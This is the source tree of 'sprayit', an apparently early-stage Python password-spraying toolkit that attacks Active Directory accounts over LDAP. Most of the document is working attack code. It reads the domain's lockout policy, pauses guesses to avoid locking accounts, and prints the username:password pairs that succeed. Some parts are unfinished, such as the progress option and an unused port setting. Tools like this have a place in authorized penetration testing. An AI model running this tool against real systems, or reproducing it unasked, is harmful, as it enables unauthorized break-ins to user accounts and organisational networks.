├── .gitignore ├── LICENSE ├── MANIFEST.in ├── Makefile ├── README.md ├── setup.py └── sprayit ├── __init__.py ├── __main__.py ├── _version.py ├── common ├── __init__.py └── targetgens │ ├── __init__.py │ ├── arghelper.py │ ├── file.py │ └── list.py ├── modules ├── __init__.py └── ldap │ ├── __init__.py │ └── ldapspray.py └── sprayer.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 skelsec 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /MANIFEST.in: -------------------------------------------------------------------------------- 1 | include LICENSE 2 | include README.md 3 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | clean: 2 | rm -f -r build/ 3 | rm -f -r dist/ 4 | rm -f -r *.egg-info 5 | find . -name '*.pyc' -exec rm -f {} + 6 | find . -name '*.pyo' -exec rm -f {} + 7 | find . -name '*~' -exec rm -f {} + 8 | 9 | publish: clean 10 | python3 setup.py sdist bdist_wheel 11 | python3 -m twine upload dist/* 12 | 13 | rebuild: clean 14 | python3 setup.py install 15 | 16 | build: 17 | python3 setup.py install -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # sprayit 2 | Password spraying toolkit 3 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | from setuptools import setup, find_packages 2 | import re 3 | 4 | VERSIONFILE="sprayit/_version.py" 5 | verstrline = open(VERSIONFILE, "rt").read() 6 | VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]" 7 | mo = re.search(VSRE, verstrline, re.M) 8 | if mo: 9 | verstr = mo.group(1) 10 | else: 11 | raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,)) 12 | 13 | 14 | setup( 15 | # Application name: 16 | name="sprayit", 17 | 18 | # Version number (initial): 19 | version=verstr, 20 | 21 | # Application author details: 22 | author="Tamas Jos", 23 | author_email="info@skelsecprojects.com", 24 | 25 | # Packages 26 | packages=find_packages(), 27 | 28 | # Include additional files into the package 29 | include_package_data=True, 30 | 31 | 32 | # Details 33 | url="https://github.com/skelsec/sprayit", 34 | 35 | zip_safe = False, 36 | # 37 | # license="LICENSE.txt", 38 | description="Password spraying", 39 | long_description="Password spraying", 40 | 41 | # long_description=open("README.txt").read(), 42 | python_requires='>=3.7', 43 | classifiers=( 44 | "Programming Language :: Python :: 3.7", 45 | "Programming Language :: Python :: 3.8", 46 | "License :: OSI Approved :: MIT License", 47 | "Operating System :: OS Independent", 48 | ), 49 | install_requires=[ 50 | 'msldap>=0.3.21', 51 | 'asysocks>=0.0.10', 52 | 'tqdm', 53 | ], 54 | entry_points={ 55 | 'console_scripts': [ 56 | 'sprayit = sprayit.__main__:main', 57 | ], 58 | } 59 | ) -------------------------------------------------------------------------------- /sprayit/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Author: 4 | # Tamas Jos (@skelsec) 5 | # 6 | 7 | import logging 8 | 9 | logger = logging.getLogger(__name__) 10 | handler = logging.StreamHandler() 11 | formatter = logging.Formatter( 12 | '%(asctime)s %(name)-12s %(levelname)-8s %(message)s') 13 | handler.setFormatter(formatter) 14 | logger.addHandler(handler) 15 | logger.setLevel(logging.INFO) -------------------------------------------------------------------------------- /sprayit/__main__.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import logging 3 | from tqdm import tqdm 4 | from sprayit import logger 5 | from sprayit.sprayer import Sprayer 6 | from sprayit.modules.ldap import LDAPSpray 7 | from sprayit.common.targetgens.arghelper import get_targets, get_passwords, get_users 8 | 9 | 10 | async def amain(): 11 | import argparse 12 | 13 | parser = argparse.ArgumentParser(description='Pure Python implementation of Mimikatz --and more--') 14 | parser.add_argument('-v', '--verbose', action='count', default=0) 15 | parser.add_argument('-w', '--worker-count', type=int, default=4, help='Parallell count') 16 | parser.add_argument('--progress', action='store_true', help='NOT IMPLEMENTED YET! Show progress') 17 | 18 | subparsers = parser.add_subparsers(help = 'module') 19 | subparsers.required = True 20 | subparsers.dest = 'module' 21 | 22 | ldap_group = subparsers.add_parser('ldap', help= 'LDAP module') 23 | ldap_group.add_argument('--authmethod', choices=['ntlm', 'sicily', 'plain'], default='ntlm', help='port') 24 | ldap_group.add_argument('-b', '--badpwcount', help='Bad password count allowed by the domain. Must be bigger than 2') 25 | ldap_group.add_argument('-l', '--lockout-treshold', help='Amount of time in secodsn of which th domain controller checks for bad passwords') 26 | ldap_group.add_argument('-d', '--domain', help='domain') 27 | ldap_group.add_argument('-u', '--user', action='append', help='Username or file with users') 28 | ldap_group.add_argument('-p', '--password', action='append', help='Password or file qith passwords') 29 | ldap_group.add_argument('--users-from-module', action='store_true', help='Get target users by using the LDAP URL') 30 | ldap_group.add_argument('--url', help='Connection URL base, target can be set to anything. Owerrides all parameter based connection settings! Example: "smb2+ntlm-password://TEST\\victim@test"') 31 | ldap_group.add_argument('--port', type=int, default=398, help='port') 32 | ldap_group.add_argument('--ldaps', action='store_true', help='Use LDAP over SSL') 33 | ldap_group.add_argument('target', help = 'Hostname or IP address') 34 | 35 | args = parser.parse_args() 36 | 37 | 38 | ###### VERBOSITY 39 | if args.verbose == 0: 40 | logging.basicConfig(level=logging.INFO) 41 | elif args.verbose == 1: 42 | logger.setLevel(logging.DEBUG) 43 | else: 44 | logger.setLevel(logging.DEBUG) 45 | logging.basicConfig(level=logging.DEBUG) 46 | 47 | if args.module == 'ldap': 48 | 49 | max_bad_password_cnt = int(args.badpwcount) if args.badpwcount is not None else 5 50 | lockout_treshold = int(args.lockout_treshold) if args.lockout_treshold is not None else 30 51 | 52 | progq = None 53 | if args.progress: 54 | progq = asyncio.Queue() 55 | 56 | tp = 'ldap' if args.ldaps is False else 'ldaps' 57 | module = LDAPSpray(args.url) 58 | target = LDAPSpray.build_taget_template(args.target, target_protocol=tp) 59 | sprayer = Sprayer( 60 | module, 61 | target, 62 | domain=args.domain, 63 | users_from_module=args.users_from_module, 64 | max_bad_password_cnt = max_bad_password_cnt, 65 | lockout_treshold = lockout_treshold, 66 | progress_queue = progq, 67 | ) 68 | get_passwords(args, sprayer) 69 | get_users(args, sprayer) 70 | 71 | if not args.progress: 72 | return await sprayer.run() 73 | else: 74 | main_task = asyncio.create_task(sprayer.run()) 75 | # TODO 76 | 77 | 78 | def main(): 79 | asyncio.run(amain()) 80 | 81 | 82 | if __name__ == '__main__': 83 | main() -------------------------------------------------------------------------------- /sprayit/_version.py: -------------------------------------------------------------------------------- 1 | 2 | __version__ = "0.0.1" 3 | __banner__ = \ 4 | """ 5 | # sprayit %s 6 | # Author: Tamas Jos @skelsec (info@skelsecprojects.com) 7 | """ % __version__ -------------------------------------------------------------------------------- /sprayit/common/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/skelsec/sprayit/ab011713aea1ed5d2031545adf21af0f5938ba90/sprayit/common/__init__.py -------------------------------------------------------------------------------- /sprayit/common/targetgens/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/skelsec/sprayit/ab011713aea1ed5d2031545adf21af0f5938ba90/sprayit/common/targetgens/__init__.py -------------------------------------------------------------------------------- /sprayit/common/targetgens/arghelper.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | from sprayit.common.targetgens.file import FileTargetGen 4 | from sprayit.common.targetgens.list import ListTargetGen 5 | 6 | 7 | def get_targets(args, obj, throw = True): 8 | notfile = [] 9 | if len(args.targets) == 0 and getattr(args, 'stdin', False) is True: 10 | obj.target_gens.append(ListTargetGen(sys.stdin)) 11 | else: 12 | for target in args.targets: 13 | try: 14 | f = open(target, 'r') 15 | f.close() 16 | obj.target_gens.append(FileTargetGen(target)) 17 | except: 18 | notfile.append(target) 19 | 20 | if len(notfile) > 0: 21 | obj.target_gens.append(ListTargetGen(notfile)) 22 | 23 | if len(obj.target_gens) == 0 and throw is True: 24 | print('[-] No suitable targets were found!') 25 | return 26 | 27 | def get_users(args, obj, throw = True): 28 | notfile = [] 29 | if len(args.user) == 0 and getattr(args, 'stdin', False) is True: 30 | obj.user_gens.append(ListTargetGen(sys.stdin)) 31 | else: 32 | for target in args.user: 33 | try: 34 | f = open(target, 'r') 35 | f.close() 36 | obj.user_gens.append(FileTargetGen(target)) 37 | except: 38 | notfile.append(target) 39 | 40 | if len(notfile) > 0: 41 | obj.user_gens.append(ListTargetGen(notfile)) 42 | 43 | if len(obj.user_gens) == 0 and throw is True: 44 | print('[-] No suitable users were found!') 45 | return 46 | 47 | def get_passwords(args, obj, throw = True): 48 | notfile = [] 49 | if len(args.password) == 0 and getattr(args, 'stdin', False) is True: 50 | obj.password_gens.append(ListTargetGen(sys.stdin)) 51 | else: 52 | for target in args.password: 53 | try: 54 | f = open(target, 'r') 55 | f.close() 56 | obj.password_gens.append(FileTargetGen(target)) 57 | except: 58 | notfile.append(target) 59 | 60 | if len(notfile) > 0: 61 | obj.password_gens.append(ListTargetGen(notfile)) 62 | 63 | if len(obj.password_gens) == 0 and throw is True: 64 | print('[-] No suitable users were found!') 65 | return -------------------------------------------------------------------------------- /sprayit/common/targetgens/file.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import uuid 3 | 4 | class FileTargetGen: 5 | def __init__(self, filename): 6 | self.filename = filename 7 | self.total_cnt = 0 8 | 9 | async def run(self, target_q): 10 | try: 11 | self.total_cnt = 0 12 | with open(self.filename, 'r') as f: 13 | for line in f: 14 | line = line.strip() 15 | if line == '': 16 | continue 17 | await target_q.put((str(uuid.uuid4()), line)) 18 | await asyncio.sleep(0) 19 | self.total_cnt += 1 20 | return self.total_cnt, None 21 | except Exception as e: 22 | return self.total_cnt, e 23 | 24 | async def get_all(self): 25 | try: 26 | with open(self.filename, 'r') as f: 27 | for line in f: 28 | line = line.strip() 29 | if line == '': 30 | continue 31 | yield str(uuid.uuid4()), line, None 32 | await asyncio.sleep(0) 33 | self.total_cnt += 1 34 | except Exception as e: 35 | yield None, None, e -------------------------------------------------------------------------------- /sprayit/common/targetgens/list.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import uuid 3 | 4 | class ListTargetGen: 5 | def __init__(self, targets): 6 | self.targets = targets 7 | self.total_cnt = 0 8 | 9 | async def run(self, target_q): 10 | try: 11 | for target in self.targets: 12 | self.total_cnt += 1 13 | target = target.strip() 14 | await target_q.put((str(uuid.uuid4()),target)) 15 | await asyncio.sleep(0) 16 | return self.total_cnt, None 17 | except Exception as e: 18 | return self.total_cnt, e 19 | 20 | async def get_all(self): 21 | try: 22 | for line in self.targets: 23 | self.total_cnt += 1 24 | line = line.strip() 25 | if line == '': 26 | continue 27 | yield str(uuid.uuid4()), line, None 28 | await asyncio.sleep(0) 29 | self.total_cnt += 1 30 | except Exception as e: 31 | yield None, None, e -------------------------------------------------------------------------------- /sprayit/modules/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/skelsec/sprayit/ab011713aea1ed5d2031545adf21af0f5938ba90/sprayit/modules/__init__.py -------------------------------------------------------------------------------- /sprayit/modules/ldap/__init__.py: -------------------------------------------------------------------------------- 1 | from sprayit.modules.ldap.ldapspray import LDAPSpray 2 | 3 | __all__ = ['LDAPSpray'] -------------------------------------------------------------------------------- /sprayit/modules/ldap/ldapspray.py: -------------------------------------------------------------------------------- 1 | from msldap.connection import MSLDAPClientConnection 2 | from msldap.commons.credential import MSLDAPCredential, LDAPAuthProtocol 3 | from msldap.commons.target import MSLDAPTarget, LDAPProtocol 4 | from msldap.commons.url import MSLDAPURLDecoder 5 | 6 | class LDAPSpray: 7 | def __init__(self, url = None): 8 | self.url = url 9 | self.client = None 10 | self.lockout_duration = 0 11 | self.lockout_observation = 0 12 | self.lockout_treshold = 9999 13 | self.minpwlen = 0 14 | 15 | async def get_lockout_treshold(self): 16 | return self.lockout_observation, None 17 | 18 | async def get_badpassword_max(self): 19 | return self.lockout_treshold, None 20 | 21 | async def get_users(self): 22 | if self.client is None: 23 | yield None, None, None 24 | else: 25 | yield None, None, NotImplementedError('') 26 | 27 | async def setup(self): 28 | try: 29 | if self.url is not None: 30 | self.client = MSLDAPURLDecoder(self.url).get_client() 31 | _, err = await self.client.connect() 32 | if err is not None: 33 | raise err 34 | 35 | adinfo, err = await self.client.get_ad_info() 36 | if err is not None: 37 | raise err 38 | if adinfo.lockoutDuration: 39 | self.lockout_duration = ((-1 * adinfo.lockoutDuration) // 10000000) 40 | if adinfo.lockOutObservationWindow: 41 | self.lockout_observation = ((-1 * adinfo.lockOutObservationWindow) // 10000000) 42 | if adinfo.lockoutThreshold: 43 | self.lockout_treshold = adinfo.lockoutThreshold 44 | self.minpwlen = adinfo.minPwdLength 45 | 46 | 47 | return True, None 48 | except Exception as e: 49 | return False, e 50 | 51 | @staticmethod 52 | def build_taget_template(target, target_protocol = 'ldap', target_port = 389, proxy = None): 53 | lproto = LDAPProtocol.TCP 54 | if target_protocol.lower() == 'ldap': 55 | lproto = LDAPProtocol.TCP 56 | elif target_protocol.lower() == 'ldaps': 57 | lproto = LDAPProtocol.SSL 58 | 59 | target = MSLDAPTarget( 60 | target, 61 | port = target_port, 62 | proto = lproto, 63 | tree = None, 64 | proxy = proxy, 65 | timeout = 10 66 | ) 67 | return target 68 | 69 | @staticmethod 70 | def get_password_from_cred(cred): 71 | #because not all modules will have password as variable 72 | return cred.password 73 | 74 | @staticmethod 75 | def build_auth_template(domain, username, password, auth_protocol = 'ntlm'): 76 | aproto = LDAPAuthProtocol.NTLM_PASSWORD 77 | if auth_protocol.lower() == 'ntlm': 78 | aproto = LDAPAuthProtocol.NTLM_PASSWORD 79 | elif auth_protocol.lower() == 'sicily': 80 | aproto = LDAPAuthProtocol.SICILY 81 | elif auth_protocol.lower() == 'plain': 82 | aproto = LDAPAuthProtocol.PLAIN 83 | elif auth_protocol.lower() == 'simple': 84 | aproto = LDAPAuthProtocol.SIMPLE 85 | 86 | cred = MSLDAPCredential( 87 | domain=domain, 88 | username= username, 89 | password = password, 90 | auth_method = aproto, 91 | settings = None, 92 | etypes = None) 93 | 94 | return cred 95 | 96 | async def try_credential(self, target, cred): 97 | connection = None 98 | try: 99 | 100 | connection = MSLDAPClientConnection(target, cred) 101 | _, err = await connection.connect() 102 | if err is not None: 103 | return False, 'CONNECTIONERR' 104 | _, err = await connection.bind() 105 | if err is not None: 106 | return False, 'CREDENTIALERR' 107 | return True, None 108 | except Exception as e: 109 | import traceback 110 | traceback.print_exc() 111 | return False, e 112 | 113 | finally: 114 | if connection is not None: 115 | try: 116 | await connection.disconnect() 117 | except: 118 | pass 119 | 120 | 121 | -------------------------------------------------------------------------------- /sprayit/sprayer.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import datetime 3 | 4 | from sprayit import logger 5 | 6 | class SprayitProgress: 7 | def __init__(self, domain, username, password, error, total, current): 8 | self.username = username 9 | self.password = password 10 | self.error = error 11 | self.total = total 12 | self.current = current 13 | 14 | 15 | class Sprayer: 16 | def __init__(self, module, target, max_bad_password_cnt = 5, lockout_treshold = 30 ,users_from_module = False, domain = None, worker_cnt = 4, progress_queue = None): 17 | self.module = module 18 | self.domain = domain 19 | self.target = target 20 | self.progress_queue = progress_queue 21 | self.worker_cnt = worker_cnt 22 | self.user_gens = [] 23 | self.password_gens = [] 24 | self.lockout_treshold = lockout_treshold 25 | self.max_bad_password_cnt = max_bad_password_cnt 26 | self.users_from_module = users_from_module 27 | 28 | self.users_progress = {} #userid -> credential 29 | self.users_table = {} #user id -> last bad password 30 | self.finished_users = {} #user id -> password 31 | 32 | self.users = {} 33 | self.passwords = [] 34 | self.workers = [] 35 | self.in_q = None 36 | self.out_q = None 37 | self.spray_task = None 38 | self.target_gen_finished_evt = None 39 | self.finished_evt = None 40 | self.workers_finished_cnt = 0 41 | self.total = 0 42 | self.current = 0 43 | 44 | async def __worker(self): 45 | try: 46 | while True: 47 | res = await self.in_q.get() 48 | if res is None: 49 | return 50 | uid, target, cred = res 51 | 52 | cres, err = await self.module.try_credential(target, cred) 53 | if err is not None: 54 | await self.out_q.put((uid, self.module.get_password_from_cred(cred), err)) 55 | else: 56 | await self.out_q.put((uid, self.module.get_password_from_cred(cred), None)) 57 | 58 | 59 | except Exception as e: 60 | logger.debug('Worker died! Reason: %s' % e) 61 | finally: 62 | self.workers_finished_cnt += 1 63 | 64 | async def __spray(self): 65 | try: 66 | domain = self.domain 67 | for uid in self.users: 68 | username = self.users[uid] 69 | if username.find('\\') != -1: 70 | domain, username = username.split('\\', 1) 71 | if uid not in self.users_progress: 72 | self.users_progress[uid] = [] 73 | for _, password in self.passwords: 74 | self.total += 1 75 | self.users_progress[uid].append(self.module.build_auth_template(domain, username, password, auth_protocol = 'ntlm')) 76 | 77 | to_delete = [] 78 | for uid in self.users_progress: 79 | creds = [] 80 | for _ in range(self.max_bad_password_cnt - 2): 81 | if self.users_progress[uid]: 82 | creds.append(self.users_progress[uid].pop()) 83 | else: 84 | to_delete.append(uid) 85 | break 86 | 87 | for cred in creds: 88 | await self.in_q.put((uid, self.target, cred)) 89 | 90 | self.users_table[uid] = datetime.datetime.utcnow() 91 | 92 | for uid in to_delete: 93 | del self.users_progress[uid] 94 | 95 | while True: 96 | if len(self.users_progress) == 0: 97 | break 98 | 99 | for uid in self.finished_users: 100 | if uid in self.users_table: 101 | del self.users_table[uid] 102 | 103 | if uid in self.users_progress: 104 | del self.users_progress[uid] 105 | 106 | to_check = [] 107 | for uid in self.users_table: 108 | if (datetime.datetime.utcnow() - self.users_table[uid]).total_seconds() < self.lockout_treshold: 109 | continue 110 | to_check.append(uid) 111 | 112 | if len(to_check) > 0: 113 | 114 | if uid in to_check: 115 | creds = [] 116 | for _ in range(self.max_bad_password_cnt - 2): 117 | if self.users_progress[uid]: 118 | creds.append(self.users_progress[uid].pop()) 119 | else: 120 | del self.users_progress[uid] 121 | break 122 | 123 | for cred in creds: 124 | await self.in_q.put((uid, self.target, cred)) 125 | 126 | await asyncio.sleep(5) 127 | 128 | for _ in range(len(self.workers)): 129 | await self.in_q.put(None) 130 | 131 | self.target_gen_finished_evt.set() 132 | 133 | except Exception as e: 134 | logger.exception('__spray error!') 135 | 136 | async def check_finished(self): 137 | while True: 138 | await asyncio.sleep(1) 139 | if self.target_gen_finished_evt.is_set(): 140 | if self.worker_cnt == self.workers_finished_cnt: 141 | if self.out_q.empty() is True: 142 | self.finished_evt.set() 143 | return True 144 | 145 | async def run(self): 146 | try: 147 | for target_gen in self.user_gens: 148 | async for uid, target, err in target_gen.get_all(): 149 | if err is not None: 150 | raise err 151 | self.users[uid] = target 152 | 153 | for target_gen in self.password_gens: 154 | async for uid, target, err in target_gen.get_all(): 155 | if err is not None: 156 | raise err 157 | self.passwords.append((uid, target)) 158 | 159 | _, err = await self.module.setup() 160 | if err is not None: 161 | raise err 162 | 163 | self.lockout_treshold, err = await self.module.get_lockout_treshold() 164 | if err is not None: 165 | raise err 166 | self.max_bad_password_cnt, err = await self.module.get_badpassword_max() 167 | if err is not None: 168 | raise err 169 | 170 | if self.users_from_module is True: 171 | async for uid, users, err in self.module.get_users(): 172 | if err is not None: 173 | raise err 174 | self.users[uid] = users 175 | 176 | self.in_q = asyncio.Queue(self.worker_cnt) 177 | self.out_q = asyncio.Queue() 178 | self.finished_evt = asyncio.Event() 179 | self.target_gen_finished_evt = asyncio.Event() 180 | 181 | self.spray_task = asyncio.create_task(self.__spray()) 182 | for _ in range(self.worker_cnt): 183 | self.workers.append(asyncio.create_task(self.__worker())) 184 | 185 | 186 | while not self.finished_evt.is_set(): 187 | waiters = [self.out_q.get(), self.check_finished()] 188 | for res in asyncio.as_completed(waiters): 189 | res = await res 190 | if res is True: 191 | break 192 | 193 | self.current += 1 194 | userid, password, error = res 195 | if self.progress_queue: 196 | prog = SprayitProgress(self.domain, self.users[userid], password, error, self.total, self.current) 197 | await self.progress_queue.put(prog) 198 | 199 | if error is None: 200 | self.finished_users[userid] = password 201 | if self.progress_queue is None: 202 | print('[+] %s : %s' % (self.users[userid], self.finished_users[userid])) 203 | break 204 | else: 205 | if error == 'CONNECTIONERR': 206 | raise Exception('Server connection error!') 207 | elif error == 'CREDENTIALERR': 208 | logger.debug('[-] Cred not good! %s : %s' % (self.users[userid], password)) 209 | break 210 | else: 211 | raise Exception('Unknown error! %s' % error) 212 | 213 | for worker in self.workers: 214 | worker.cancel() 215 | 216 | return True, None 217 | except Exception as e: 218 | logger.exception('sprayit.run error!') 219 | return [], e 220 | 221 | 222 | 223 | 224 | --------------------------------------------------------------------------------